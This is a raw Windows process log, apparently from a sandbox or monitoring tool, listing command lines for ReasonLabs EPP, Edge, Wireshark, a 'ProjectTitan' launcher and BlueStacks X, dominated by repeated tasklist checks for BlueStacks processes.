"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4288 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7256 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7788 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\program files\reasonlabs\epp\rsLitmus.A.exe

"C:\program files\reasonlabs\epp\rsLitmus.A.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

F:\ProjectTitan\Engine\Launcher.exe

"F:\ProjectTitan\Engine\Launcher.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

F:\ProjectTitan\Engine\ProjectTitan.exe

"F:\ProjectTitan\Engine\ProjectTitan.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3616 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\Wireshark\Wireshark.exe

"C:\Program Files\Wireshark\Wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\Wireshark\extcap\etwdump.exe

"C:\Program Files\Wireshark\extcap\etwdump.exe" --extcap-interfaces --extcap-version=4.2

C:\Program Files\Wireshark\extcap\androiddump.exe

"C:\Program Files\Wireshark\extcap\androiddump.exe" --extcap-interfaces --extcap-version=4.2

C:\Program Files\Wireshark\extcap\udpdump.exe

"C:\Program Files\Wireshark\extcap\udpdump.exe" --extcap-interfaces --extcap-version=4.2

C:\Program Files\Wireshark\extcap\etwdump.exe

"C:\Program Files\Wireshark\extcap\etwdump.exe" --extcap-config --extcap-interface etwdump

C:\Program Files\Wireshark\extcap\udpdump.exe

"C:\Program Files\Wireshark\extcap\udpdump.exe" --extcap-config --extcap-interface udpdump

C:\Program Files\Wireshark\dumpcap.exe

"C:\Program Files\Wireshark\dumpcap.exe" -D -Z none

C:\Program Files\Wireshark\dumpcap.exe

"C:\Program Files\Wireshark\dumpcap.exe" -i \Device\NPF_Loopback -L --list-time-stamp-types -Z none

C:\Program Files\Wireshark\extcap\etwdump.exe

"C:\Program Files\Wireshark\extcap\etwdump.exe" --extcap-dlts --extcap-interface etwdump

C:\Program Files\Wireshark\extcap\udpdump.exe

"C:\Program Files\Wireshark\extcap\udpdump.exe" --extcap-dlts --extcap-interface udpdump

C:\Program Files\Wireshark\dumpcap.exe

"C:\Program Files\Wireshark\dumpcap.exe" -S -Z 9008.dummy

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\Wireshark\dumpcap.exe

"C:\Program Files\Wireshark\dumpcap.exe" -n -i \Device\NPF_Loopback -Z 9008

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\Wireshark\dumpcap.exe

"C:\Program Files\Wireshark\dumpcap.exe" -S -Z 9008.dummy

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=161 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10644 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=162 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=163 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=164 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=165 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10536 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=166 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10664 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

F:\BlueStacks X\BlueStacks X.exe

"F:\BlueStacks X\BlueStacks X.exe"

F:\BlueStacks X\BlueStacksWeb.exe

